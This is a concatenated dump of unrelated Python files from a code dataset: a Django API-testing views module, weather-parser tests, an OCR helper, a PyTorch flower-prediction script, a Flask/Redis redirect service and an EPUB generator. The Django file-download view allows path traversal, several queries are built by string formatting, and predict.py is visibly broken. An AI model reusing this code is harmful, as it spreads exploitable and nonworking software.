\"\"\"\n :return: 阻塞主进程,直到所有线程完成任务\n \"\"\"\n for future in as_completed(self.tasks):\n # print(\"等待...{}\".format(len(self.tasks)))\n future.result()\n\n\n@require_http_methods([\"GET\"])\ndef download(req, file_path):\n file_path_real = os.path.join(settings.MEDIA_ROOT_VIRTUAL, file_path)\n if not os.path.exists(file_path_real):\n return response_404(\"文件不存在:{}!\".format(file_path))\n\n file = open(file_path_real, 'rb')\n response = FileResponse(file)\n response['Content-Type'] = 'application/octet-stream'\n # response['Content-Type'] = 'application/vnd.ms-excel' # 注意格式\n response['Content-Disposition'] = 'attachment;filename=\"{}\"'.format(file_path_real.rsplit(\"/\")[-1])\n\n return response\n\n\ndef customer_get_list(model, filter_item=None, order_by=None):\n \"\"\"\n :param model: 模型类对象\n :param filter_item: 字典\n :param order_by: 元祖,传入 () 时不排序\n :return:\n \"\"\"\n\n filter_item = filter_item or {}\n order_by = order_by or (\"title\", ) if order_by != -1 else ()\n datas = []\n\n try:\n infos = model.m.filter(**filter_item).order_by(*order_by)\n\n for i in infos:\n datas.append(model_to_dict_custom(i))\n\n except Exception as e:\n return response_400(\"错误信息:{}\".format(e))\n\n return response_200(data=datas)\n\n\ndef model_to_dict_custom(model):\n\n data = model_to_dict(model, exclude=[\"isDelete\", \"c_date\", \"u_date\"])\n data[\"c_date\"] = model.c_date.strftime('%Y-%m-%d %H:%M:%S')\n data[\"u_date\"] = model.u_date.strftime('%Y-%m-%d %H:%M:%S')\n\n return data\n\n\ndef api_ids_handle(item):\n \"\"\"\n :param item: 根据item中的project_id, group_ids,api_ids获取对应所有api_id\n 会在item中补充group_title_list,api_title_list字段\n :return: 返回 msg(错误信息)和api_id_list\n \"\"\"\n api_id_list = None\n\n def set_msg_and_return(msg=\"\"):\n if msg:\n item[\"msg\"] = msg\n item[\"isValid\"] = False\n # item[\"group_title_list\"] = json_dumps(['测试内容失效!:{}'.format(msg)])\n # item[\"api_title_list\"] = json_dumps(['测试内容失效!:{}'.format(msg)])\n item[\"group_title_list\"] = \"\"\n item[\"api_title_list\"] = \"\"\n return msg, api_id_list\n\n if not item[\"group_ids\"] and not item[\"api_ids\"]:\n return set_msg_and_return(\"未填写分组id或接口id!\")\n\n # 验证project_id\n if item[\"project_id\"]:\n try:\n pro_data = ApiProject.m.get(id=item[\"project_id\"])\n except:\n return set_msg_and_return(\"不存在的项目id:{}\".format(item[\"project_id\"]))\n else:\n item[\"project_title\"] = pro_data.title\n else:\n return set_msg_and_return(\"未填写项目id!\")\n\n # 获取group_id_list, group_title_list\n group_id_list = []\n group_title_list = []\n\n if item[\"group_ids\"] == \"all\":\n group_list = ApiGroup.m.filter(project=item[\"project_id\"])\n for i in group_list:\n group_id_list.append(i.id)\n group_title_list.append(i.title)\n else:\n # 判断所有group_id是否存在\n group_id_list = str_to_list(item[\"group_ids\"])\n for group_id in group_id_list:\n try:\n group_data = ApiGroup.m.get(id=int(group_id))\n except:\n return set_msg_and_return(\"不存在的分组id:{}\".format(group_id))\n else:\n group_title_list.append(\"分组:{} -- {}\".format(group_data.id, group_data.title))\n\n # 获取api_id_list, api_title_list\n api_id_list = str_to_list(item[\"api_ids\"])\n api_title_list = []\n # 判断所有api_id是否存在\n for api_id in api_id_list:\n try:\n api_data = ApiApi.m.get(id=int(api_id))\n except:\n return set_msg_and_return(\"不存在的接口id:{}\".format(api_id))\n else:\n api_title_list.append(\"接口:{} -- {}\".format(api_data.id, api_data.title))\n\n # 解析group下的所有api,放到api_id_list中\n for group_id in group_id_list:\n apis = ApiApi.m.filter(group=int(group_id))\n for api in apis:\n api_id_list.append(str(api.id))\n\n api_id_list = list(set(api_id_list)) # 去重,防止group下的api和api重复\n if not api_id_list:\n return set_msg_and_return(\"分组id与接口id 清洗后没有符合的数据!\")\n\n item[\"group_title_list\"] = json_dumps(group_title_list) if group_title_list else \"\"\n item[\"api_title_list\"] = json_dumps(api_title_list) if api_title_list else \"\"\n # return group_id_list, api_id_list\n return set_msg_and_return()\n\n\ndef case_ids_handle(item):\n def set_msg_and_return(msg=\"\"):\n if msg:\n item[\"msg\"] = msg\n item[\"isValid\"] = False\n # item[\"case_title_list\"] = json_dumps(['测试内容失效!:{}'.format(msg)])\n item[\"case_title_list\"] = \"\"\n return msg, case_id_list\n\n case_title_list = []\n case_id_list = str_to_list(item[\"case_ids\"])\n for case_id in case_id_list:\n try:\n case_data = ApiCase.m.get(id=int(case_id))\n case_title_list.append(\"用例:{} -- {}\".format(case_data.id, case_data.title))\n except:\n return set_msg_and_return(\"不存在的用例id:{}\".format(case_id))\n\n if not case_title_list:\n return set_msg_and_return(\"没有填写用例!\")\n\n item[\"case_title_list\"] = json_dumps(case_title_list) if case_title_list else \"\"\n return set_msg_and_return()\n\n\ndef get_all_projects(filter_item=None, **kwargs):\n if filter_item is None:\n filter_item = {}\n filter_item.update(kwargs)\n return ApiProject.m.filter(**filter_item).order_by(\"title\")\n\n\n# 每个项目 分组 接口 用例 统计 柱形图\ndef staticitem_project(req):\n # data = []\n project_title_list = []\n group_count_list = []\n api_count_list = []\n case_count_list = []\n\n cursor = connection.cursor()\n case_sql = \"SELECT api_id, count(*) FROM api_case WHERE isDelete=false group by api_id;\"\n cursor.execute(case_sql)\n cases = cursor.fetchall()\n\n projects = get_all_projects()\n for project in projects:\n project_title_list.append(project.title)\n groups = ApiGroup.m.filter(project_id=project.id)\n group_count = len(groups)\n api_count = 0\n case_count = 0\n for gourp in groups:\n apis = ApiApi.m.filter(group_id=gourp.id)\n api_count += len(apis)\n for api in apis:\n for case in cases:\n if case[0] == api.id:\n case_count += case[1]\n group_count_list.append(group_count)\n api_count_list.append(api_count)\n case_count_list.append(case_count)\n # data.append({project.title: [group_count, api_count, case_count]})\n # print(\"{}: 分组:{}个,接口{}个,用例{}个\\n\".format(\n # project.title, group_count, api_count, case_count))\n # print(\"总计{}个用例\".format(len(ApiCase.m.filter())))\n\n return response_200(\n project_title_list=project_title_list,\n group_count_list=group_count_list,\n api_count_list=api_count_list,\n case_count_list=case_count_list,\n all_count=len(ApiCase.m.filter()))\n\n\n# 项目下任务数量统计、任务中包含总用例数量统计\ndef staticitem_task(req):\n data = []\n projects = get_all_projects()\n for project in projects:\n task_count = TestTask.m.filter(project_id=project.id).count()\n data.append({\"name\": project.title, \"value\": task_count})\n\n tasks = TestTask.m.filter()\n case_count_for_task = 0\n for task in tasks:\n count = len(str_to_list(task.case_ids))\n case_count_for_task += count\n\n return response_200(data=data, task_count=TestTask.m.filter().count(),\n case_count_for_task=case_count_for_task)\n\n\n# 每个项目 最近100次、10次成功情况/最近七天成功失败次数\ndef staticitem_recent(req):\n # 最近七天成功失败次数\n project_id = req.GET.get(\"project_id\", \"\")\n filter_item = {}\n if project_id:\n filter_item[\"id\"] = project_id\n\n days = [] # 最近七天 datetime时间格式,需要str才能得到 2021-07-02\n today = datetime.date.today() # 获得今天的日期\n for i in range(7):\n day = today - datetime.timedelta(days=i)\n days.insert(0, day)\n\n colors = [\"#5470c6\", \"#91cc75\", \"#fac858\", \"#ee6666\",\n \"#73c0de\", \"#3ba272\", \"#fc8452\", \"#9a60b4\",\n \"#ea7ccc\", \"#f173ac\", \"#f05b72\",\n \"#fdb933\", \"#f26522\", \"#ef5b9c\"]\n colors_q = Queue()\n for color in colors:\n colors_q.put(color)\n\n titles = []\n series = []\n cursor = connection.cursor()\n projects = get_all_projects(filter_item)\n username = str(req.session.get(\"user\"))\n for project in projects:\n if username not in str_to_list(project.users or \"\"):\n continue\n\n if colors_q.empty():\n for color in colors:\n colors_q.put(color)\n title_succeed = \"{} - 成功数量\".format(project.title)\n titles.append(title_succeed)\n title_fail = \"{} - 失败数量\".format(project.title)\n titles.append(title_fail)\n\n temp_succeed = {\n \"name\": title_succeed,\n \"type\": 'bar',\n \"stack\": project.title,\n \"emphasis\": {\n \"focus\": 'series'\n },\n \"data\": [],\n \"itemStyle\": {\n \"normal\": {\n \"label\": {\n \"show\": True,\n \"position\": 'middle',\n \"textStyle\": {\n \"color\": 'black',\n \"fontSize\": 24 if project_id else 12\n }\n },\n \"color\": \"#73c0de\" if project_id else colors_q.get()\n }\n }\n }\n temp_fail = {\n \"name\": title_fail,\n \"type\": 'bar',\n \"stack\": project.title,\n \"emphasis\": {\n \"focus\": 'series'\n },\n \"data\": [],\n \"itemStyle\": {\n \"normal\": {\n \"label\": {\n \"show\": True,\n \"position\": 'top',\n \"textStyle\": {\n \"color\": 'red',\n \"fontSize\": 24 if project_id else 14\n }\n },\n \"color\": \"#ee6666\" if project_id else colors_q.get()\n }\n }\n }\n for d in days:\n cursor.execute(\n \"select count(*) from api_test_report where (c_date between '{}' and '{}') and project_title = '{}' and test_ret = 1\".format(\n str(d), str(d + datetime.timedelta(days=1)), project.title\n ))\n succed_count = str(cursor.fetchone()[0])\n temp_succeed[\"data\"].append(succed_count)\n\n cursor.execute(\n \"select count(*) from api_test_report where (c_date between '{}' and '{}') and project_title = '{}' and test_ret = 0\".format(\n str(d), str(d + datetime.timedelta(days=1)), project.title\n ))\n fail_count = cursor.fetchone()[0]\n temp_fail[\"data\"].append(str(fail_count))\n\n series.append(temp_succeed)\n series.append(temp_fail)\n\n return response_200(series=series, titles=titles, days=days)\n\n\n# 按人员统计 用例总数,近7周增加\ndef staticitem_user(req):\n days_raw = [] # [\"2021-07-01\", \"2021-07-07\", ...]\n days = [] # [\"2021-07-01 -- 2021-07-07\", \"2021-07-01 -- 2021-07-07\", ...]\n # 测试组全部成员,有限使用自定义的,没有自定义的,用全部的django用户\n try:\n users = str_to_list(ApiUser.m.get(type_id=\"1\").users or \"\")\n except:\n users = []\n users_raw = User.objects.filter()\n for user in users_raw:\n users.append(user.username)\n\n series = []\n\n today = datetime.date.today() # 获得今天的日期\n # 本周第一天和最后一天\n this_week_start = today - datetime.timedelta(days=today.weekday())\n # this_week_end = today + datetime.timedelta(days=6 - today.weekday())\n days_raw.append([this_week_start, today])\n for i in range(1, 7):\n # 上周第一天和最后一天\n last_week_start = today - datetime.timedelta(days=today.weekday() + 7 * i)\n last_week_end = today - datetime.timedelta(days=today.weekday() + 1 + 7 * (i-1))\n days_raw.append([last_week_start, last_week_end])\n # print(days)\n\n for user in users:\n temp = {\n \"name\": user,\n \"type\": 'line',\n \"data\": []\n }\n series.append(temp)\n\n cursor = connection.cursor()\n for day in days_raw:\n days.append(\"{} - {}\".format(str(day[0]).replace(\"-\", \"/\"), str(day[1]).replace(\"-\", \"/\")))\n sql = \"SELECT create_user, count(*) FROM api_case WHERE (c_date between '{}' and '{}') and isDelete=false GROUP BY create_user;\".format(\n str(day[0]), str(day[1] + datetime.timedelta(days=1)))\n # print(sql)\n cursor.execute(sql)\n rets = cursor.fetchall()\n for serie in series:\n for ret in rets:\n if ret[0] == serie[\"name\"]:\n serie[\"data\"].append(ret[1])\n break\n else:\n serie[\"data\"].append(0)\n\n return response_200(series=series, users=users, days=days)\n\n\n# 统计每个人创建的用例数量\ndef staticitem_user2(req):\n series = []\n cursor = connection.cursor()\n sql = \"SELECT create_user_id, count(*) FROM api_case WHERE isDelete=false group by create_user_id;\"\n cursor.execute(sql)\n\n for line in cursor.fetchall():\n series.append({\"name\": User.objects.get(id=line[0]).username or \"无\", \"value\": line[1]})\n\n return response_200(series=series)\n\n# def get_host_ip():\n# try:\n# s = socket.socket()\n# s.connect((\"www.baidu.com\", 80))\n# ip = s.getsockname()[0]\n# finally:\n# s.close()\n# return ip\n\n\n\ndef strToBase64(s):\n '''\n 将字符串转换为base64字符串\n :param s:\n :return:\n '''\n strEncode = base64.b64encode(s.encode('utf8'))\n return str(strEncode, encoding='utf8')\n\n\ndef base64ToStr(s):\n '''\n 将base64字符串转换为字符串\n :param s:\n :return:\n '''\n strDecode = base64.b64decode(bytes(s, encoding=\"utf8\"))\n return str(strDecode, encoding='utf8')\n\n","sub_path":"api/view_basic.py","file_name":"view_basic.py","file_ext":"py","file_size_in_byte":25244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"216284261","text":"\"\"\"Test MOS Parsing.\"\"\"\n\nimport pytest\nfrom pyiem.nws.products.mos import parser as mosparser\nfrom pyiem.util import get_dbconn, utc, get_test_file\n\n\n@pytest.fixture\ndef cursor():\n \"\"\"Return a database cursor.\"\"\"\n return get_dbconn('mos').cursor()\n\n\ndef test_180125_empty(cursor):\n \"\"\"Can we parse a MOS product with empty data\"\"\"\n utcnow = utc(2018, 1, 26, 1)\n prod = mosparser(get_test_file(\"MOS/MET_empty.txt\"), utcnow=utcnow)\n assert len(prod.data) == 3\n assert len(prod.data[0]['data'].keys()) == 21\n\n inserts = prod.sql(cursor)\n assert inserts == 42\n\n\ndef test_parse(cursor):\n \"\"\"MOS type\"\"\"\n utcnow = utc(2017, 8, 12, 12)\n prod = mosparser(get_test_file(\"MOS/METNC1.txt\"), utcnow=utcnow)\n assert len(prod.data) == 4\n assert len(prod.data[0]['data'].keys()) == 21\n\n inserts = prod.sql(cursor)\n assert inserts == (4 * 21)\n\n\ndef test_empty_nbm(cursor):\n \"\"\"Does an empty product trip us up.\"\"\"\n utcnow = utc(2018, 11, 7, 17)\n prod = mosparser(get_test_file(\"MOS/NBSUSA_empty.txt\"), utcnow=utcnow)\n assert len(prod.data) == 2\n\n inserts = prod.sql(cursor)\n assert inserts == 0\n\n\ndef test_nbm(cursor):\n \"\"\"Can we parse the NBM data.\"\"\"\n utcnow = utc(2018, 11, 7, 15)\n prod = mosparser(get_test_file(\"MOS/NBSUSA.txt\"), utcnow=utcnow)\n assert len(prod.data) == 2\n\n inserts = prod.sql(cursor)\n assert inserts == (2 * 21)\n\n cursor.execute(\"\"\"\n SELECT count(*), max(ftime) from t2018\n where model = 'NBS' and station = 'KALM' and runtime = %s\n \"\"\", (utcnow, ))\n row = cursor.fetchone()\n assert row[0] == 21\n assert row[1] == utc(2018, 11, 10, 9)\n","sub_path":"pyiem/nws/products/tests/test_mos.py","file_name":"test_mos.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"557251429","text":"# -*- encoding: utf-8 -*-\n# Copyright (C) 2017 TSDV TTEC. All rights reserved.\n\n\nclass WordProperty(object):\n \"\"\"\n This class handle word element get from element tree\n \"\"\"\n def __init__(self, word):\n if word is not None:\n self.id = word.id\n self.x = word.x\n self.y = word.y\n self.w = word.w\n self.h = word.h\n self.color = str(word.color)\n self.highlight_color = str(word.highlight_color)\n self.spaces_before = word.spaces_before\n self.x_wconf = float(word.wfont)\n self.font_name = str(word.font)\n self.font_size = float(word.size)\n self.value = word.value\n self.bold = word.bold\n self.italic = word.italic\n self.underline = word.underline\n else:\n self.id = None\n self.x = None\n self.y = None\n self.w = None\n self.h = None\n self.color = None\n self.highlight_color = None\n self.spaces_before = None\n self.x_wconf = None\n self.font_name = None\n self.font_size = None\n self.value = None\n self.bold = None\n self.italic = None\n self.underline = None\n","sub_path":"Run_PHocr_test/PHOcr_C2404_D3_linux_release/lib/phocroffice/phocr_shared/word_property.py","file_name":"word_property.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"439870945","text":"# coding=utf-8\n\n# construct unique key using settings for pickling\nimport Settings\n\n\"\"\" PETER - CHANGE THESE FILE PATHS \"\"\"\n\"\"\" DATA - raw essay files + annotations\"\"\"\nroot = \"/Users/simon.hughes/Google Drive/PhD/Data/ActiveLearning/\"\ndata = root + \"EBA1415_Merged/\" # Location where the data is, use EBA_Pre and Post test essays preferably\n\n\"\"\" OUTPUT - two serialized files, one for the pre-processed essays, the other for the features \"\"\"\nserialized_features = root + \"essay_feats.pl\"\nserialized_essays = root + \"essays.pl\"\n\"\"\" END SETTINGS \"\"\"\n\nfrom featureextractortransformer import FeatureExtractorTransformer\nfrom load_data import load_process_essays\n\nfrom featureextractionfunctions import *\nfrom window_based_tagger_config import get_config\n\nimport cPickle as pickle\nimport logging\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nlogger = logging.getLogger()\n\n# not hashed as don't affect persistence of feature processing\n\nconfig = get_config(data)\n\n\"\"\" FEATURE EXTRACTION \"\"\"\noffset = (config[\"window_size\"] - 1) / 2\n\nunigram_window_stemmed = fact_extract_positional_word_features_stemmed(offset)\nbiigram_window_stemmed = fact_extract_ngram_features_stemmed(offset, 2)\n\nextractors = [unigram_window_stemmed, biigram_window_stemmed]\nfeat_config = dict(config.items() + [(\"extractors\", extractors)])\n\n\"\"\" LOAD DATA \"\"\"\ntagged_essays = load_process_essays( **config )\nlogger.info(\"Essays loaded\")\n# most params below exist ONLY for the purposes of the hashing to and from disk\nfeature_extractor = FeatureExtractorTransformer(extractors)\n\nessay_feats = feature_extractor.transform(tagged_essays)\nlogger.info(\"Features loaded\")\n\nwith open(serialized_essays, \"w+\") as f_essays:\n pickle.dump(tagged_essays, f_essays)\n\nwith open(serialized_features, \"w+\") as f_feats:\n pickle.dump(essay_feats, f_feats)\n\nlogger.info(\"Serialized\")","sub_path":"Experiments/CoralBleaching_ActiveLearning/CreateTrainingData.py","file_name":"CreateTrainingData.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"634970857","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nUdacity project\r\n\r\nBy Jean Desire.\r\n\"\"\"\r\n# =============================================================================\r\n# Import Libraries\r\n# =============================================================================\r\n\r\nimport numpy as np\r\nimport torch\r\nimport os\r\nimport time\r\nimport random\r\nimport json\r\nfrom torch import nn,optim\r\nimport torch.nn.functional as F\r\nimport torchvision\r\nfrom torchvision import datasets,transforms,models\r\nfrom collections import OrderedDict\r\nfrom torch.autograd import Variable\r\nfrom PIL import Image\r\nimport copy\r\nimport argparse\r\nfrom os.path import isdir\r\n\r\n# =============================================================================\r\n# Define Functions\r\n# =============================================================================\r\n\r\ndef arg_parser():\r\n \r\n parser = argparse.ArgumentParser(description=\"Neural Network Settings\")\r\n\r\n # Image for prediction\r\n parser.add_argument('--image', \r\n type=str, \r\n help='Point to impage file for prediction.',\r\n required=True)\r\n\r\n # Load checkpoint created in train.py\r\n parser.add_argument('--checkpoint', \r\n type=str, \r\n help='Point to checkpoint file as str.',\r\n required=True)\r\n \r\n # top-k\r\n parser.add_argument('--top_k', \r\n type=int, \r\n help=' top k classes.')\r\n \r\n # Import category names\r\n parser.add_argument('--category_names', \r\n type=str, \r\n help='names of structures/architectures.')\r\n\r\n # Add GPU \r\n parser.add_argument('--gpu', \r\n action=\"store_true\", \r\n help='GPU ')\r\n\r\n # Parse args\r\n args = parser.parse_args()\r\n \r\n return args\r\n\r\ndef load_checkpoint(checkpoint_path):\r\n # Load the saved file\r\n checkpoint = torch.load(\"my_checkpoint.pth\")\r\n \r\n # Load Defaults if none specified\r\n if checkpoint['architecture'] == 'vgg16':\r\n model = models.vgg16(pretrained=True)\r\n model.name = \"vgg16\"\r\n else: \r\n exec(\"model = models.{}(pretrained=True)\".checkpoint['architecture'])\r\n model.name = checkpoint['architecture']\r\n \r\n # Freeze parameters so we don't backprop through them\r\n for param in model.parameters(): param.requires_grad = False\r\n \r\n # Load stuff from checkpoint\r\n model.class_to_idx = checkpoint['class_to_idx']\r\n model.classifier = checkpoint['classifier']\r\n model.load_state_dict(checkpoint['state_dict'])\r\n \r\n return model\r\n\r\n\r\n\r\ndef process_image(image):\r\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n returns an Numpy array\r\n '''\r\n data_dir = \"./flowers\"\r\n image = (data_dir + '/test' + '/1/' + 'image_06752.jpg')\r\n pil_image = PIL.Image.open(image)\r\n \r\n adjustments = transforms.Compose([\r\n transforms.Resize(256),\r\n transforms.CenterCrop(224),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\r\n ])\r\n \r\n img_tensor = adjustments(pil_image)\r\n np_image = np.array(img_tensor)\r\n \r\n return np_image\r\n\r\n\r\ndef predict(image_tensor, model, device, cat_to_name, top_k):\r\n ''' Predict the class (or classes) of an image using a trained deep learning model.\r\n \r\n image_path: string. Path to image, directly to image and not to folder.\r\n model: pytorch neural network.\r\n top_k: integer. The top K classes to be calculated\r\n \r\n returns top_probabilities(k), top_labels\r\n '''\r\n \r\n # check top_k\r\n if type(top_k) == type(None):\r\n top_k = 5\r\n print(\"Top K not specified, assuming K=5.\")\r\n \r\n # Set model to evaluate\r\n model.eval();\r\n\r\n # Convert image from numpy to torch\r\n torch_image = torch.from_numpy(np.expand_dims(image_tensor, \r\n axis=0)).type(torch.FloatTensor)\r\n\r\n model=model.cpu()\r\n\r\n # Find probabilities (results) by passing through the function (note the log softmax means that its on a log scale)\r\n log_probs = model.forward(torch_image)\r\n\r\n # Convert to linear scale\r\n linear_probs = torch.exp(log_probs)\r\n\r\n # Find the top 5 results\r\n top_probs, top_labels = linear_probs.topk(top_k)\r\n \r\n # Detatch all of the details\r\n top_probs = np.array(top_probs.detach())[0] \r\n top_labels = np.array(top_labels.detach())[0]\r\n \r\n # Convert to classes\r\n idx_to_class = {val: key for key, val in \r\n model.class_to_idx.items()}\r\n top_labels = [idx_to_class[lab] for lab in top_labels]\r\n top_flowers = [cat_to_name[lab] for lab in top_labels]\r\n \r\n return top_probs, top_labels, top_flowers\r\n\r\n\r\ndef print_probability(probs, flowers):\r\n \"\"\"\r\n Converts two lists into a dictionary to print on screen\r\n \"\"\"\r\n \r\n for i, j in enumerate(zip(flowers, probs)):\r\n print (\"Rank {}:\".format(i+1),\r\n \"Flower: {}, liklihood: {}%\".format(j[1], ceil(j[0]*100)))\r\n\r\n \r\n# =============================================================================\r\n# Main Function\r\n# ============================================================================= \r\ndef main():\r\n \"\"\"\r\n Executing relevant functions\r\n \"\"\"\r\n \r\n # Get Keyword Args for Prediction\r\n args = arg_parser()\r\n \r\n # Load categories to names json file\r\n with open(args.category_names, 'r') as f:\r\n \tcat_to_name = json.load(f)\r\n\r\n # Load model trained with train.py\r\n model = load_checkpoint(args.checkpoint)\r\n \r\n # Process Image\r\n image_tensor = process_image(args.image)\r\n \r\n # Check for GPU\r\n device = check_gpu(gpu_arg=args.gpu);\r\n \r\n # The top K most likely classes\r\n top_probs, top_labels, top_flowers = predict(image_tensor, model, \r\n device, cat_to_name,\r\n args.top_k)\r\n \r\n # Print out probabilities\r\n print_probability(top_flowers, top_probs)\r\n\r\n\r\n# =============================================================================\r\n# Run Program\r\n# =============================================================================\r\nif __name__ == '__main__': main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":6431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"643793147","text":"\"\"\"\nMake & save the final plots used in the paper.\n\"\"\"\n\n\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt \nimport os \n\n# plot format -- can put this in config file but that's too much work for so little change \npd.options.display.mpl_style = 'default' \nmpl.rcParams['axes.facecolor'] = 'w' # Give me back the white background!\nmpl.rcParams['axes.labelsize'] = 24\nmpl.rcParams['lines.linewidth'] = 1.5\nmpl.rcParams['lines.markersize'] = 8\nmpl.rcParams['lines.markeredgewidth'] = 1.0\n\n\nDATA_PATH = \"C:\\\\Users\\\\t-yeresh\\\\data\\\\storks2012\"\nTABLE_DATA_PATH = \"C:\\\\Users\\\\t-yeresh\\\\Google Drive\\\\PhD\\\\Manuscripts\\\\DSAA15--journal version\\\\res\"\n\n\ndef loss_plot(in_name, out_name, y_label):\n \"\"\" The 0-1 and log loss plolts; Data from .csv files comes from the log of main.py\n Make plots with no background, large text, large legend, large X maks -- LARGE EVERYTHING! \n \"\"\"\n f = pd.DataFrame.from_csv(os.path.join(TABLE_DATA_PATH, in_name))\n f.plot(style=['>:','<--','^-.', 's--', 'o-'])\n plt.xlabel(\"Number of clusters\", fontsize=20)\n plt.ylabel(y_label, fontsize=20)\n plt.legend(loc = 'center left', bbox_to_anchor=(1.0, 0.5))\n plt.savefig(os.path.join(TABLE_DATA_PATH, out_name), bbox_inches=\"tight\")\n plt.close()\n\ndef walking_plots():\n \"\"\" Data comes from raw ACC \"\"\" \n pass\n\nif __name__ == \"__main__\":\n loss_plot(\"0-1-loss.txt\", \"0-1.png\", \"0-1 loss\")\n loss_plot(\"log-loss.txt\", \"log.png\", \"Log loss\")","sub_path":"acc_stuff/self_contained/DSAA/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"252869084","text":"#! /bin/sh\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash, Response\n\nimport redis\nredis = redis.StrictRedis(host='localhost', port=6379, db=0)\n\napp = Flask(__name__)\napp.debug = True\n\n\ndef ip_delete_store(remoteip):\n app.logger.debug(\"delete {}\".format(remoteip))\n return redis.delete(remoteip)\n\ndef ip_get_store(remoteip):\n app.logger.debug(\"getting {}\".format(remoteip))\n return redis.get(remoteip)\n\ndef ip_set_store(remoteip,localip):\n app.logger.debug(\"setting {} to {}\".format(remoteip,localip))\n return redis.set(remoteip,localip)\n\n@app.route('/',methods=[\"GET\"])\ndef get_ip():\n remoteip = request.access_route[0]\n localip = ip_get_store(remoteip)\n if localip:\n return redirect(\"http://{}/\".format(localip), 302)\n else:\n return Response(\"No IP stored for you\")\n\n@app.route('/',methods=[\"POST\"])\ndef set_ip():\n remoteip = request.access_route[0]\n localip = request.get_data()\n return Response(str(ip_set_store(remoteip,localip)))\n\n@app.route('/',methods=[\"DELETE\"])\ndef delete_ip():\n remoteip = request.access_route[0]\n return Response(str(ip_delete_store(remoteip)))\n\n\nif __name__ == '__main__':\n app.run(port=8001)\n","sub_path":"mycube/websrv.py","file_name":"websrv.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"369787642","text":"#! /usr/bin/jython\n# -*- encoding: utf-8 -*-\n# ----------------------------------------------------------\n#\n#\tepub_createapy.\n#\n#\t\t\t\t\t\tSep/17/2014\n#\n# ----------------------------------------------------------\nimport\tsys\nimport\tjava\nfrom java.lang import\tSystem\nfrom java.lang import\tString\n\nfrom java.io import FileOutputStream\n\nfrom com.adobe.dp.epub.io import OCFContainerWriter\nfrom com.adobe.dp.epub.ncx import TOCEntry\nfrom com.adobe.dp.epub.opf import NCXResource\nfrom com.adobe.dp.epub.opf import OPSResource\nfrom com.adobe.dp.epub.opf import Publication\nfrom com.adobe.dp.epub.ops import Element\nfrom com.adobe.dp.epub.ops import OPSDocument\n\n\nsys.path.append ('/var/www/data_base/common/python_common')\nfrom text_manipulate import dict_append_proc\n# ----------------------------------------------------------\ndef dict_to_epub_proc (epub_file,dict_aa):\n\tepub = Publication()\n\n\tepub.addDCMetadata(\"title\", \"My First EPUB\")\n\tepub.addDCMetadata(\"creator\", System.getProperty(\"user.name\"))\n\tepub.addDCMetadata(\"language\", \"ja\")\n\n\ttoc = epub.getTOC()\n\trootTOCEntry = toc.getRootTOCEntry()\n\n\tmain = epub.createOPSResource(\"OPS/main.html\")\n\tepub.addToSpine(main)\n\n\tmainDoc = main.getDocument()\n\n\tmainTOCEntry = toc.createTOCEntry(\"Intro\", mainDoc.getRootXRef())\n\trootTOCEntry.add(mainTOCEntry)\n\n\tbody = mainDoc.getBody()\n\n\tfor key in dict_aa.keys():\n\t\tunit_aa=dict_aa[key];\n\t\tparagraph_bb = mainDoc.createElement(\"p\")\n\t\tname = unit_aa[\"name\"]\n#\n\t\tpopulation = unit_aa[\"population\"]\n\t\tstr_population = str (population)\n\t\tdate_mod = unit_aa[\"date_mod\"]\n\t\tparagraph_bb.add(key)\n\t\tparagraph_bb.add(\" \")\n\t\tparagraph_bb.add(name)\n\t\tparagraph_bb.add(\" \")\n\t\tparagraph_bb.add(str_population)\n\t\tparagraph_bb.add(\" \")\n\t\tparagraph_bb.add(date_mod)\n\t\tbody.add(paragraph_bb)\n\n\twriter = OCFContainerWriter (FileOutputStream(epub_file))\n#\twriter = OCFContainerWriter.new(FileOutputStream.new(epub_file))\n\tepub.serialize(writer)\n#\n# ----------------------------------------------------------\ndef data_prepare_proc ():\n\tdict_aa = {}\n\n\tdict_aa = dict_append_proc(dict_aa,'t1931','甲府'.decode('utf-8'),81635,'2004-2-11')\n\tdict_aa = dict_append_proc(dict_aa,'t1932','富士吉田'.decode('utf-8'),39427,'2004-4-23')\n\tdict_aa = dict_append_proc(dict_aa,'t1933','都留'.decode('utf-8'),61523,'2004-5-24')\n\tdict_aa = dict_append_proc(dict_aa,'t1934','山梨'.decode('utf-8'),18624,'2004-9-14')\n\tdict_aa = dict_append_proc(dict_aa,'t1935','大月'.decode('utf-8'),72931,'2004-8-12')\n\tdict_aa = dict_append_proc(dict_aa,'t1936','韮崎'.decode('utf-8'),28519,'2004-7-28')\n\tdict_aa = dict_append_proc(dict_aa,'t1937','南アルプス'.decode('utf-8'),39457,'2004-6-19')\n\tdict_aa = dict_append_proc(dict_aa,'t1938','北杜'.decode('utf-8'),36872,'2004-11-15')\n\tdict_aa = dict_append_proc(dict_aa,'t1939','甲斐'.decode('utf-8'),81235,'2004-10-24')\n\n\treturn\tdict_aa\n#\n# ----------------------------------------------------------\nprint (\"*** 開始 ***\")\n\nepub_file = sys.argv[1]\n\ndict_aa = 